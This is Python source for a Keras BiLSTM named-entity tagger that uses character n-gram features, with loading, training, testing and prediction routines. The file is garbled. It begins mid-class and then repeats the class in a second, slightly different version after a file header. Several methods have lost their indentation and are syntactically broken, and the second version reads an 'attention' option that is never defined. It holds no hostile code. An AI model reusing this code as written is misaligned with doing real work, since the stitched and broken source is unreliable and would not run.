        self.dirName = None           # directory where model + aux data live
        self.sModelName = None        # model base name
        self.sAux = "aux.pkl"         # suffix of the pickled auxiliary data
        self.nbClasses = None         # number of tag classes incl. NIL
        self.max_sentence_len = 0     # padding length, set while loading data
        self.max_features = 100       # vocabulary size of the CountVectorizer
        self.maxngram = 3             # max character n-gram length
        self.nbEpochs = 10
        self.batch_size = 50
        self.hiddenSize= 32           # LSTM hidden units
        self.bGridSearch = False
        # Mode flags, set by setParams()
        self.bTraining_multitype,self.bTraining, self.bTesting, self.bPredict = False,False,False, False
        self.lTrain = []              # training file names
        self.lTest = []               # test file names
        self.lPredict= []
        self.bMultiType = False       # multi-task (BIES + label) model
        # mapping vector: tag -> one-hot tuple and one-hot tuple -> tag
        self.tag_vector={}
    def setParams(self,dParams):
        """
        Copy the command line options (an OptionParser values object) into
        the corresponding attributes; unset options keep their defaults.
        """
        if dParams.dirname:
            self.dirName = dParams.dirname
        if dParams.name:
            self.sModelName = dParams.name
        if dParams.batchSize:
            self.batch_size = dParams.batchSize
        if dParams.nbEpochs:
            self.nbEpochs = dParams.nbEpochs
        if dParams.hidden:
            self.hiddenSize = dParams.hidden
        if dParams.nbfeatures:
            self.max_features = dParams.nbfeatures
        if dParams.ngram:
            self.maxngram = dParams.ngram
        self.bMultiType = dParams.multitype
        if dParams.training:
            self.lTrain = dParams.training
            self.bTraining=True
        if dParams.testing:
            self.lTest = dParams.testing
            self.bTesting=True
        if dParams.predict:
            self._sent =dParams.predict #.decode('latin-1')
            self.bPredict=True
    def initTransformeur(self):
        """ Build the feature pipeline: character n-grams (1..maxngram)
        counted by a CountVectorizer limited to max_features, then converted
        to a dense array for Keras. """
        self.cv= CountVectorizer( max_features = self.max_features
                              , analyzer = 'char' ,ngram_range = (1,self.maxngram)
                              , dtype=np.float64)
        self.node_transformer =  FeatureUnion([
            ("ngrams", Pipeline([
                            ('selector', NodeTransformerTextEnclosed()),
                            ('cv', self.cv),
                           ('todense', SparseToDense())
                            ])
             )
        ])
def load_data_Multitype(self,lFName):
"""
load data as training data (x,y)
nbClasses must be known!
"""
self.nbClasses = 0
self.lClasses=[]
lTmp=[]
for fname in lFName:
f=open(fname,encoding='utf-8')
x=[]
for l in f:
l = l.strip()
if l[:3] == '# ':continue # comments
if l =='EOS':
lTmp.append(x)
self.max_sentence_len = max(self.max_sentence_len,len(x))
x=[]
else:
try:
la=l.split('\t')
b1=la[-1].split('_')[0]
b2=la[-1].split('_')[1]
except ValueError:
#print 'cannot find value and label in: %s'%(l)
continue
assert len(la) != 0
if b2 not in self.lClasses:
self.lClasses.append(b2)
if b1 not in self.lClasses:
self.lClasses.append(b1)
x.append((la[0],(b1,b2)))
if x != []:
lTmp.append(x)
f.close()
self.nbClasses = len(self.lClasses) + 1
for tag_class_id,b in enumerate(self.lClasses):
one_hot_vec = np.zeros(self.nbClasses, dtype=np.int32)
one_hot_vec[tag_class_id] = 1
self.tag_vector[b] = tuple(one_hot_vec)
self.tag_vector[tuple(one_hot_vec)] = b
# Add nil class
if 'NIL' not in self.tag_vector:
self.lClasses.append('NIL')
one_hot_vec = np.zeros(self.nbClasses, dtype=np.int32)
one_hot_vec[self.nbClasses-1] = 1
self.tag_vector['NIL'] = tuple(one_hot_vec)
self.tag_vector[tuple(one_hot_vec)] = 'NIL'
# print self.nbClasses
# shuffle(lTmp)
lX = []
lY = []
for sample in lTmp:
lX.append(list(map(lambda xy:xy[0],sample)))
lY.append(list(map(lambda xy:xy[1],sample)))
del lTmp
return lX,lY
def load_data(self,lFName):
"""
load data as training data (x,y)
nbClasses must be known!
"""
self.nbClasses = 0
self.lClasses=[]
lTmp=[]
for fname in lFName:
f=open(fname,encoding='utf-8')
x=[]
for l in f:
l = l.strip()
if l[:3] == '# ':continue # comments
if l =='EOS':
lTmp.append(x)
self.max_sentence_len = max(self.max_sentence_len,len(x))
x=[]
else:
try:
la=l.split('\t')
b1=la[-1]
except ValueError:
print ('cannot find value and label in: %s'%(l))
sys.exit()
assert len(la) != 0
if b1 not in self.lClasses:
self.lClasses.append(b1)
x.append((la[0],b1))
if x != []:
lTmp.append(x)
f.close()
self.nbClasses = len(self.lClasses) + 1
for tag_class_id,b in enumerate(self.lClasses):
one_hot_vec = np.zeros(self.nbClasses, dtype=np.int32)
one_hot_vec[tag_class_id] = 1
self.tag_vector[b] = tuple(one_hot_vec)
self.tag_vector[tuple(one_hot_vec)] = b
# Add nil class
if 'NIL' not in self.tag_vector:
self.lClasses.append('NIL')
one_hot_vec = np.zeros(self.nbClasses, dtype=np.int32)
one_hot_vec[self.nbClasses-1] = 1
self.tag_vector['NIL'] = tuple(one_hot_vec)
self.tag_vector[tuple(one_hot_vec)] = 'NIL'
# print self.nbClasses
# shuffle(lTmp)
lX = []
lY = []
for sample in lTmp:
lX.append(list(map(lambda xy:xy[0],sample)))
lY.append(list(map(lambda xy:xy[1],sample)))
del lTmp
return lX,lY
def load_data_for_testing(self,lFName):
"""
load data as training data (x,y)
nbClasses must be known!
loadModel first!
"""
lTmp=[]
for fname in lFName:
f=open(fname,encoding='utf-8')
x=[]
for l in f:
l = l.strip()
if l[:3] == '# ':continue # comments
if l =='EOS':
if x!=[]:
lTmp.append(x)
x=[]
else:
try:
la=l.split('\t')
b1=la[-1]
except ValueError:
print('cannot find value and label in: %s'%(l))
sys.exit(1)
x.append((la[0],b1))
if x != []:
lTmp.append(x)
f.close()
lX = []
lY = []
for sample in lTmp:
lX.append(list(map(lambda xy:xy[0],sample)))
lY.append(list(map(lambda xy:xy[1],sample)))
del lTmp
return lX,lY
def load_data_for_testing_Multitype(self,lFName):
"""
load data as training data (x,y)
nbClasses must be known!
loadModel first!
"""
lTmp=[]
for fname in lFName:
f=open(fname,encoding='utf-8')
x=[]
for l in f:
l = l.strip()
if l[:3] == '# ':continue # comments
if l =='EOS':
if x!=[]:
lTmp.append(x)
x=[]
else:
try:
la=l.split('\t')
b1=la[-1].split('_')[0]
b2=la[-1].split('_')[1]
except ValueError:
print('ml:cannot find value and label in: %s'%(l))
sys.exit()
assert len(la) != 0
x.append((la[0],(b1,b2)))
if x != []:
lTmp.append(x)
f.close()
lX = []
lY = []
for sample in lTmp:
lX.append(list(map(lambda xy:xy[0],sample)))
lY.append(list(map(lambda xy:xy[1],sample)))
del lTmp
return lX,lY
    def storeModel(self,model, aux):
        """
        Store the Keras model (.hd5) and the auxiliary data needed to reload
        it (multitype flag, n-gram settings, padding length, tag mapping and
        fitted transformer) as a gzipped pickle next to it.

        NOTE(review): the `aux` parameter is unused; everything is pickled
        directly from self.
        """
        model.save('%s/%s.hd5'%(self.dirName,self.sModelName))
        print('model dumped in %s/%s.hd5' % (self.dirName,self.sModelName))
        #max_features,max_sentence_len, self.nbClasses,self.tag_vector , node_transformer
        pickle.dump((self.bMultiType,self.maxngram,self.max_features,self.max_sentence_len,self.nbClasses,self.tag_vector,self.node_transformer),gzip.open('%s/%s.%s'%(self.dirName,self.sModelName,self.sAux),'wb'))
        print('aux data dumped in %s/%s.%s' % (self.dirName,self.sModelName,self.sAux))
def loadModels(self):
"""
load models and aux data
"""
self.model = load_model(os.path.join(self.dirName,self.sModelName+'.hd5'),custom_objects={"AttentionDecoder": AttentionDecoder})
print('model loaded: %s/%s.hd5' % (self.dirName,self.sModelName))
try:
self.bMultiType,self.maxngram,self.max_features,self.max_sentence_len, self.nbClasses,self.tag_vector , self.node_transformer = pickle.load(gzip.open('%s/%s.%s'%(self.dirName,self.sModelName,self.sAux),'r'))
except:
self.maxngram,self.max_features,self.max_sentence_len, self.nbClasses,self.tag_vector , self.node_transformer = pickle.load(gzip.open('%s/%s.%s'%(self.dirName,self.sModelName,self.sAux),'r'))
self.bMultiType = False
print('aux data loaded: %s/%s.%s' % (self.dirName,self.sModelName,self.sAux))
print("ngram: %s\tmaxfea=%s\tpadding=%s\tnbclasses=%s" % (self.maxngram,self.max_features,self.max_sentence_len, self.nbClasses))
print("multitype model:%s"%(self.bMultiType))
    def training(self,traindata):
        """
        Train the single-task BiLSTM tagger on traindata = (lX, lY) as
        produced by load_data(). Returns (model, auxdata) for storeModel().
        """
        train_X,_ = traindata #self.load_data(self.lTrain)
        self.initTransformeur()
        # Fit the character n-gram vectorizer on the flattened token list
        fX= [item  for sublist in train_X  for item in sublist ]
        self.node_transformer.fit(fX)
        #
        lX,lY = self.prepareTensor(traindata)

        model = Sequential()
        reg= L1L2(l1=0.001, l2=0.0)
        # Masking skips the NIL padding timesteps added by prepareTensor()
        model.add(Masking(mask_value=0., input_shape=(self.max_sentence_len, self.max_features)))
        model.add(Bidirectional(LSTM(self.hiddenSize,return_sequences = True,bias_regularizer=reg)))
        model.add(Dropout(0.5))
        model.add(AttentionDecoder(self.max_sentence_len, self.nbClasses))
        model.add(TimeDistributed(Dense(self.nbClasses, activation='softmax')))
        model.compile(loss='categorical_crossentropy', optimizer='rmsprop',metrics=['categorical_accuracy'] )
        print (model.summary())
        _ = model.fit(lX, lY, epochs = self.nbEpochs,batch_size = self.batch_size, verbose = 1,validation_split = 0.33, shuffle=True)
        del lX,lY

        auxdata = self.max_features,self.max_sentence_len,self.nbClasses,self.tag_vector,self.node_transformer

        return model, auxdata
    def training_multitype(self,traindata):
        """
        Train the multi-task BiLSTM tagger: one shared BiLSTM with two
        softmax output heads (BIES segmentation and label).
        Returns (model, auxdata) for storeModel().
        """
        train_X,_ = traindata #self.load_data(self.lTrain)
        self.initTransformeur()
        # Fit the character n-gram vectorizer on the flattened token list
        fX= [item  for sublist in train_X  for item in sublist ]
        self.node_transformer.fit(fX)
        #
        lX,(lY,lY2) = self.prepareTensor_multitype(traindata)

        inputs = Input(shape=(self.max_sentence_len, self.max_features))
        # Masking skips the NIL padding timesteps added by prepareTensor_multitype()
        x = Masking(mask_value=0)(inputs)
        x = Bidirectional(LSTM(self.hiddenSize,return_sequences = True))(x)
        x = Dropout(0.5)(x)
        out1 = TimeDistributed(Dense(self.nbClasses, activation='softmax'),name='BIES')(x)
        out2 = TimeDistributed(Dense(self.nbClasses, activation='softmax'),name='Label')(x)
        # NOTE(review): `input=`/`output=` are the legacy Keras 1 kwargs;
        # newer Keras expects `inputs=`/`outputs=` -- confirm installed version
        model = Model(input = inputs,output = [out1,out2])
        model.compile(loss='categorical_crossentropy', optimizer='rmsprop',metrics=['categorical_accuracy'] )
        print (model.summary())
        _ = model.fit(lX, [lY,lY2], epochs = self.nbEpochs,batch_size = self.batch_size, verbose = 1,validation_split = 0.33, shuffle=True)
        del lX,lY

        auxdata = self.max_features,self.max_sentence_len,self.nbClasses,self.tag_vector,self.node_transformer

        return model, auxdata
    def prepareTensor_multitype(self,annotated):
        """
        Turn annotated samples (lx, ly) into padded numpy tensors.

        Each token is vectorized with node_transformer; each (BIES, label)
        tag pair is mapped to two one-hot vectors. Sequences are right-padded
        with NIL up to max_sentence_len.

        Returns lX, (lY1, lY2).
        """
        lx,ly = annotated
        lX = list()
        lY1= list()
        lY2= list()
        for x,y in zip(lx,ly):
            words = self.node_transformer.transform(x)
            wordsvec = []
            elem_tags1 = []
            elem_tags2 = []
            for ix,ss in enumerate(words):
                wordsvec.append(ss)
                # y[ix] is a (BIES, label) pair; each half gets its own one-hot
                elem_tags1.append(list(self.tag_vector[y[ix][0]]))
                elem_tags2.append(list(self.tag_vector[y[ix][1]]))
            nil_X = np.zeros(self.max_features)
            nil_Y = np.array(self.tag_vector['NIL'])
            pad_length = self.max_sentence_len - len(wordsvec)
            lX.append( wordsvec +((pad_length)*[nil_X]) )
            lY1.append( elem_tags1 + ((pad_length)*[nil_Y]) )
            lY2.append( elem_tags2 + ((pad_length)*[nil_Y]) )
        del lx
        del ly
        lX=np.array(lX)
        lY1=np.array(lY1)
        lY2=np.array(lY2)
        return lX,(lY1,lY2)
    def prepareTensor(self,annotated):
        """
        Turn annotated samples (lx, ly) into padded numpy tensors.

        Each token is vectorized with node_transformer; each tag is mapped
        to its one-hot vector. Sequences are right-padded with NIL up to
        max_sentence_len.

        Returns lX, lY.
        """
        lx,ly = annotated
        lX = list()
        lY= list()
        for x,y in zip(lx,ly):
            words = self.node_transformer.transform(x)
            wordsvec = []
            elem_tags = []
            for ix,ss in enumerate(words):
                wordsvec.append(ss)
                elem_tags.append(list(self.tag_vector[y[ix]]))
            nil_X = np.zeros(self.max_features)
            nil_Y = np.array(self.tag_vector['NIL'])
            pad_length = self.max_sentence_len - len(wordsvec)
            lX.append( wordsvec +((pad_length)*[nil_X]) )
            lY.append( elem_tags + ((pad_length)*[nil_Y]) )
        del lx
        del ly
        lX=np.array(lX)
        lY=np.array(lY)
        return lX,lY
    def testModel(self,testdata):
        """
        Evaluate the loaded model on testdata and print, per sentence, the
        tokens with their predicted (tag, score) pairs.
        """
        lX,lY= self.prepareTensor(testdata)

        scores = self.model.evaluate(lX,lY,verbose=True)
        print(list(zip(self.model.metrics_names,scores)))

        test_x, _ = testdata

        y_pred = self.model.predict(lX)
        for i,_ in enumerate(lX):
            pred_seq = y_pred[i]
            pred_tags = []
            for class_prs in pred_seq:
                # argmax -> one-hot tuple -> tag name via the reverse tag_vector map
                class_vec = np.zeros(self.nbClasses, dtype=np.int32)
                class_vec[ np.argmax(class_prs) ] = 1
                if tuple(class_vec.tolist()) in self.tag_vector:
                    pred_tags.append((self.tag_vector[tuple(class_vec.tolist())],class_prs[np.argmax(class_prs)]))
            # Predictions beyond the real sentence length are padding
            print(test_x[i],pred_tags[:len(test_x[i])])
    def testModel_Multitype(self,testdata):
        """
        Evaluate the loaded multi-task model on testdata and print, per
        sentence and per output head (BIES, label), the predicted
        (tag, score) pairs.
        """
        lX,(lY,lY2) = self.prepareTensor_multitype(testdata)
        scores = self.model.evaluate(lX,[lY,lY2],verbose=True)
        print(list(zip(self.model.metrics_names,scores)))

        test_x, _ = testdata

        y_pred1,y_pred2 = self.model.predict(lX)
        for i,_ in enumerate(lX):
            # One prediction sequence per output head
            for pred_seq in [y_pred1[i],y_pred2[i]]:
                pred_tags = []
                for class_prs in pred_seq:
                    # argmax -> one-hot tuple -> tag name via the reverse tag_vector map
                    class_vec = np.zeros(self.nbClasses, dtype=np.int32)
                    class_vec[ np.argmax(class_prs) ] = 1
                    if tuple(class_vec.tolist()) in self.tag_vector:
                        pred_tags.append((self.tag_vector[tuple(class_vec.tolist())],class_prs[np.argmax(class_prs)]))
                # Predictions beyond the real sentence length are padding
                print(test_x[i],pred_tags[:len(test_x[i])])
def prepareOutput_multitype(self,lToken,lLTags):
"""
format final output with MultiType
first level: BIES segmentation
remaining levels: label
assumption: no contradiction between layers
"""
chunk=[]
lChunk=[]
curTag=None
for itok,tok in enumerate(lToken):
# print(tok,lLTags[0][itok],lLTags[1][itok])
BIES,_ = lLTags[0][itok]
offset = itok
tag,score2 = lLTags[1][itok]
if tag != curTag:
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score2)]
elif BIES == 'B':
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score2)]
elif BIES in ['I','E']:
chunk.append((offset,tok,score2))
elif BIES == 'S':
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score2)]
if chunk !=[]:
lChunk.append((chunk,tag))
lRes=[]
for (lList,label) in lChunk:
# tok = " ".join(map(lambda x,tok,y: tok,lList))
tok = " ".join(x[1] for x in lList)
toffset = min(x[0] for x in lList),max(x[0] for x in lList)
lScore = (x[2] for x in lList)
# print toffset,tok,label,lScore
lRes.append((toffset,tok,label,list(lScore)))
return lRes
def prepareOutput(self,lToken, lTags):
"""
format final output
"""
chunk=[]
lChunk=[]
curTag=None
for offset,(tok, (tag,score)) in enumerate(list(zip(lToken,lTags))):
# print(tok.encode('utf-8'), tag)
BIES,tag = tag.split('_')
if tag != curTag:
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score)]
elif BIES == 'B':
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score)]
elif BIES in ['I','E']:
chunk.append((offset,tok,score))
elif BIES == 'S':
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score)]
if chunk !=[]:
lChunk.append((chunk,tag))
lRes=[]
for (lList,label) in lChunk:
tok = " ".join(x[1] for x in lList)
toffset = min(x[0] for x in lList),max(x[0] for x in lList)
lScore = (x[2] for x in lList)
# tok = " ".join(map(lambda x,tok,y: tok,lList))
# toffset = (min(map(lambda offset,x,y: offset,lList)),max(map(lambda offset,x,y: offset,lList)))
# lScore = (map(lambda offset,_,score: score,lList))
lRes.append((toffset,tok,label,list(lScore)))
return lRes
    def predict_multiptype(self,lsent):
        """
        Predict over a set of sentences (unicode) with the multi-task model.
        Sentences longer than max_sentence_len are skipped with a message.
        Returns one prepareOutput_multitype() chunk list per processed
        sentence.

        NOTE(review): the method name keeps its historic typo
        ("multiptype") because run() calls it by this name.
        """
        lRes= []
        for mysent in lsent :
            if len(mysent.split())> self.max_sentence_len:
                print ('max sent length: %s'%self.max_sentence_len)
                continue
            allwords= self.node_transformer.transform(mysent.split())
            wordsvec = []
            for w in allwords:
                wordsvec.append(w)
            lX = list()
            nil_X = np.zeros(self.max_features)
            # Right-pad with NIL vectors up to the training sentence length
            pad_length = self.max_sentence_len - len(wordsvec)
            lX.append( wordsvec +((pad_length)*[nil_X]) )
            lX=np.array(lX)
            y_pred1,y_pred2 = self.model.predict(lX)
            for i,_ in enumerate(lX):
                l_multi_type_results = []
                # One prediction sequence per output head (BIES, label)
                for pred_seq in [y_pred1[i],y_pred2[i]]:
                    pred_tags = []
                    pad_length = self.max_sentence_len - len(allwords)
                    for class_prs in pred_seq:
                        # argmax -> one-hot tuple -> tag name via tag_vector
                        class_vec = np.zeros(self.nbClasses, dtype=np.int32)
                        class_vec[ np.argmax(class_prs) ] = 1
                        if tuple(class_vec.tolist()) in self.tag_vector:
                            pred_tags.append((self.tag_vector[tuple(class_vec.tolist())],class_prs[np.argmax(class_prs)]))
                    # Drop predictions for the padding timesteps
                    l_multi_type_results.append(pred_tags[:len(allwords)])
                print(l_multi_type_results)
                lRes.append(self.prepareOutput_multitype(mysent.split(),l_multi_type_results))
        return lRes
    def predict(self,lsent):
        """
        Predict over a set of sentences (unicode).
        Sentences longer than max_sentence_len are skipped with a message.
        Returns one prepareOutput() chunk list per processed sentence.
        """
        lRes= []
        for mysent in lsent :
            if len(mysent.split())> self.max_sentence_len:
                print ('max sent length: %s'%self.max_sentence_len)
                continue
            allwords= self.node_transformer.transform(mysent.split())
            wordsvec = []
            for w in allwords:
                wordsvec.append(w)
            lX = list()
            nil_X = np.zeros(self.max_features)
            # Right-pad with NIL vectors up to the training sentence length
            pad_length = self.max_sentence_len - len(wordsvec)
            lX.append( wordsvec +((pad_length)*[nil_X]) )
            lX=np.array(lX)
            y_pred = self.model.predict(lX)
            for i,_ in enumerate(lX):
                pred_seq = y_pred[i]
                pred_tags = []
                pad_length = self.max_sentence_len - len(allwords)
                for class_prs in pred_seq:
                    # argmax -> one-hot tuple -> tag name via tag_vector
                    class_vec = np.zeros(self.nbClasses, dtype=np.int32)
                    class_vec[ np.argmax(class_prs) ] = 1
                    if tuple(class_vec.tolist()) in self.tag_vector:
                        pred_tags.append((self.tag_vector[tuple(class_vec.tolist())],class_prs[np.argmax(class_prs)]))
                # Drop predictions for the padding timesteps
                lRes.append(self.prepareOutput(mysent.split(),pred_tags[:len(allwords)]))
        return lRes
    def gridSearch(self):
        """
        perform grid search training
        assume epochs,ngram, nbfeatures as N,N
        assume testing data for cross valid

        NOTE(review): not implemented -- this is a stub whose body is only
        this docstring; calling it returns None.
        """
    def run(self):
        """
        Driver: dispatches to grid search, training, testing and/or
        prediction depending on the flags set by setParams().
        """
        if self.bGridSearch:
            self.gridSearch()

        if self.bMultiType and self.bTraining:
            lX, lY = self.load_data_Multitype(self.lTrain)
            print(lY)
            model, other = self.training_multitype((lX,lY))
            # store
            self.storeModel(model,other)
            # Free the large objects once the model is persisted
            del lX, lY
            del self.node_transformer
            del model

        if self.bTraining and not self.bMultiType:
            lX, lY = self.load_data(self.lTrain)
            model, other = self.training((lX,lY))
            # store
            self.storeModel(model,other)
            del lX, lY
            del self.node_transformer
            del model

        if self.bTesting:
            self.loadModels()
            if self.bMultiType:
                lX,lY = self.load_data_for_testing_Multitype(self.lTest)
                res = self.testModel_Multitype((lX,lY))
            else:
                lX,lY = self.load_data_for_testing(self.lTest)
                res = self.testModel((lX,lY))

        if self.bPredict:
            # which input format: [unicode]
            self.loadModels()
            lsent = [self._sent]
            print (lsent)
            if self.bMultiType:
                lres = self.predict_multiptype(lsent)
            else:
                lres = self.predict(lsent)
            for r in lres:
                print (r)
if __name__ == '__main__':
    # Command-line entry point: parse options, configure the tagger, run it.
    # NOTE(review): `cmp` shadows the Python 2 builtin of the same name.
    cmp = DeepTagger()
    cmp.parser = OptionParser(usage="", version="0.1")
    cmp.parser.description = "BiLSTM approach for NER"
    cmp.parser.add_option("--name", dest="name", action="store", type="string", help="model name")
    cmp.parser.add_option("--dir", dest="dirname", action="store", type="string", help="directory to store model")
    cmp.parser.add_option("--training", dest="training", action="append", type="string", help="training data")
    cmp.parser.add_option("--ml", dest="multitype", action="store_true",default=False, help="multi type version")
    cmp.parser.add_option("--hidden", dest="hidden", action="store", type="int", help="hidden layer dimension")
    cmp.parser.add_option("--batch", dest="batchSize", action="store", type="int", help="batch size")
    cmp.parser.add_option("--epochs", dest="nbEpochs", action="store", type="int", help="nb epochs for training")
    cmp.parser.add_option("--ngram", dest="ngram", action="store", type="int", help="ngram size")
    cmp.parser.add_option("--nbfeatures", dest="nbfeatures", action="store", type="int", help="nb features")
    cmp.parser.add_option("--testing", dest="testing", action="append", type="string", help="test data")
    cmp.parser.add_option("--run", dest="predict", action="store", type="string", help="string to be categorized")

    (options, args) = cmp.parser.parse_args()

    #Now we are back to the normal programmatic mode, we set the component parameters
    cmp.setParams(options)
    #This component is quite special since it does not take one XML as input but rather a series of files.
    #doc = cmp.loadDom()
    doc = cmp.run()
# add --att
# -*- coding: utf-8 -*-
"""
taggerTrainingKeras.py
train Deep Named entities tagger
H. Déjean
copyright Naverlabs 2017
READ project
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Developed for the EU project READ. The READ project has received funding
from the European Union's Horizon 2020 research and innovation programme
under grant agreement No 674943.
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import absolute_import
import sys,os
from io import open
from optparse import OptionParser
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(sys.argv[0]))))
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.base import BaseEstimator, TransformerMixin
os.environ['KERAS_BACKEND'] = 'tensorflow'
from keras.models import Sequential, load_model, Model
from keras.layers import Bidirectional, Dropout, Input
from keras.layers.wrappers import TimeDistributed
from keras.layers.recurrent import LSTM
from keras.layers.core import Dense, Masking
from keras.regularizers import L1L2
import numpy as np
import pickle
import gzip
from contentProcessing.attentiondecoder import AttentionDecoder
class Transformer(BaseEstimator, TransformerMixin):
    """Base class for the sklearn-pipeline transformers below.

    fit() is a no-op (nothing to learn); subclasses must override transform().
    """
    def __init__(self):
        BaseEstimator.__init__(self)
        TransformerMixin.__init__(self)
    def fit(self, l, y=None):
        # nothing to learn; return self to satisfy the sklearn estimator API
        return self
    def transform(self, l):
        assert False, "Specialize this method!"
class SparseToDense(Transformer):
    """Convert a scipy sparse matrix (e.g. CountVectorizer output) to a dense ndarray."""
    def __init__(self):
        Transformer.__init__(self)
    def transform(self, o):
        # Keras layers need dense input, the vectorizer emits sparse matrices
        return o.toarray()
class NodeTransformerTextEnclosed(Transformer):
    """
    we will get a list of block and need to send back what a textual feature extractor (TfidfVectorizer) needs.
    So we return a list of strings
    """
    def transform(self, lw):
        # BUGFIX: the original returned map(lambda x: x, lw), which under
        # Python 3 is a lazy one-shot iterator, not the list the docstring
        # promises; a second pass over it would silently see nothing.
        return list(lw)
class DeepTagger():
    """Character-ngram BiLSTM sequence tagger (Keras) for named-entity tagging."""
    usage = ""
    version = "v.01"
    description = "description: keras/bilstm ner"

    def __init__(self):
        # model storage location / base name
        self.dirName = None
        self.sModelName = None
        self.sAux = "aux.pkl"          # suffix of the gzipped-pickle auxiliary file
        # dimensions, filled in by setParams()/load_data*()
        self.nbClasses = None
        self.max_sentence_len = 0      # longest training sentence (padding length)
        self.max_features = 100        # size of the char-ngram vocabulary
        self.maxngram = 3
        self.nbEpochs = 10
        self.batch_size = 50
        self.hiddenSize = 32           # LSTM hidden units (per direction)
        self.bGridSearch = False
        # mode flags, derived from the command-line options
        self.bTraining_multitype, self.bTraining, self.bTesting, self.bPredict = False, False, False, False
        self.lTrain = []
        self.lTest = []
        self.lPredict = []
        self.bAttentionLayer = False
        self.bMultiType = False
        # mapping vector: tag -> one-hot tuple AND one-hot tuple -> tag
        self.tag_vector = {}
    def setParams(self, dParams):
        """Copy parsed command-line options onto the component.

        Only truthy option values override the defaults set in __init__;
        also derives the bTraining/bTesting/bPredict mode flags.
        """
        if dParams.dirname:
            self.dirName = dParams.dirname
        if dParams.name:
            self.sModelName = dParams.name
        if dParams.batchSize:
            self.batch_size = dParams.batchSize
        if dParams.nbEpochs:
            self.nbEpochs = dParams.nbEpochs
        if dParams.hidden:
            self.hiddenSize = dParams.hidden
        if dParams.nbfeatures:
            self.max_features = dParams.nbfeatures
        if dParams.ngram:
            self.maxngram = dParams.ngram
        self.bMultiType = dParams.multitype
        if dParams.training:
            self.lTrain = dParams.training
            self.bTraining = True
        if dParams.testing:
            self.lTest = dParams.testing
            self.bTesting = True
        if dParams.predict:
            self._sent = dParams.predict  # .decode('latin-1')
            self.bPredict = True
        if dParams.attention:
            self.bAttentionLayer = True
    def initTransformeur(self):
        """Build the token -> feature-vector pipeline.

        A char n-gram (1..maxngram) CountVectorizer capped at max_features
        dimensions, densified for Keras; wrapped in a FeatureUnion so further
        feature branches can be added later.
        """
        self.cv = CountVectorizer(max_features=self.max_features
                                  , analyzer='char', ngram_range=(1, self.maxngram)
                                  , dtype=np.float64)
        self.node_transformer = FeatureUnion([
            ("ngrams", Pipeline([
                ('selector', NodeTransformerTextEnclosed()),
                ('cv', self.cv),
                ('todense', SparseToDense())
            ])
            )
        ])
def load_data_Multitype(self,lFName):
"""
load data as training data (x,y)
nbClasses must be known!
"""
self.nbClasses = 0
self.lClasses=[]
lTmp=[]
for fname in lFName:
f=open(fname,encoding='utf-8')
x=[]
for l in f:
l = l.strip()
if l[:3] == '# ':continue # comments
if l =='EOS':
lTmp.append(x)
self.max_sentence_len = max(self.max_sentence_len,len(x))
x=[]
else:
try:
la=l.split('\t')
b1=la[-1].split('_')[0]
b2=la[-1].split('_')[1]
except ValueError:
#print 'cannot find value and label in: %s'%(l)
continue
assert len(la) != 0
if b2 not in self.lClasses:
self.lClasses.append(b2)
if b1 not in self.lClasses:
self.lClasses.append(b1)
x.append((la[0],(b1,b2)))
if x != []:
lTmp.append(x)
f.close()
self.nbClasses = len(self.lClasses) + 1
for tag_class_id,b in enumerate(self.lClasses):
one_hot_vec = np.zeros(self.nbClasses, dtype=np.int32)
one_hot_vec[tag_class_id] = 1
self.tag_vector[b] = tuple(one_hot_vec)
self.tag_vector[tuple(one_hot_vec)] = b
# Add nil class
if 'NIL' not in self.tag_vector:
self.lClasses.append('NIL')
one_hot_vec = np.zeros(self.nbClasses, dtype=np.int32)
one_hot_vec[self.nbClasses-1] = 1
self.tag_vector['NIL'] = tuple(one_hot_vec)
self.tag_vector[tuple(one_hot_vec)] = 'NIL'
# print self.nbClasses
# shuffle(lTmp)
lX = []
lY = []
for sample in lTmp:
lX.append(list(map(lambda xy:xy[0],sample)))
lY.append(list(map(lambda xy:xy[1],sample)))
del lTmp
return lX,lY
def load_data(self,lFName):
"""
load data as training data (x,y)
nbClasses must be known!
"""
self.nbClasses = 0
self.lClasses=[]
lTmp=[]
for fname in lFName:
f=open(fname,encoding='utf-8')
x=[]
for l in f:
l = l.strip()
if l[:3] == '# ':continue # comments
if l =='EOS':
lTmp.append(x)
self.max_sentence_len = max(self.max_sentence_len,len(x))
x=[]
else:
try:
la=l.split('\t')
b1=la[-1]
except ValueError:
print ('cannot find value and label in: %s'%(l))
sys.exit()
assert len(la) != 0
if b1 not in self.lClasses:
self.lClasses.append(b1)
x.append((la[0],b1))
if x != []:
lTmp.append(x)
f.close()
self.nbClasses = len(self.lClasses) + 1
for tag_class_id,b in enumerate(self.lClasses):
one_hot_vec = np.zeros(self.nbClasses, dtype=np.int32)
one_hot_vec[tag_class_id] = 1
self.tag_vector[b] = tuple(one_hot_vec)
self.tag_vector[tuple(one_hot_vec)] = b
# Add nil class
if 'NIL' not in self.tag_vector:
self.lClasses.append('NIL')
one_hot_vec = np.zeros(self.nbClasses, dtype=np.int32)
one_hot_vec[self.nbClasses-1] = 1
self.tag_vector['NIL'] = tuple(one_hot_vec)
self.tag_vector[tuple(one_hot_vec)] = 'NIL'
# print self.nbClasses
# shuffle(lTmp)
lX = []
lY = []
for sample in lTmp:
lX.append(list(map(lambda xy:xy[0],sample)))
lY.append(list(map(lambda xy:xy[1],sample)))
del lTmp
return lX,lY
def load_data_for_testing(self,lFName):
"""
load data as training data (x,y)
nbClasses must be known!
loadModel first!
"""
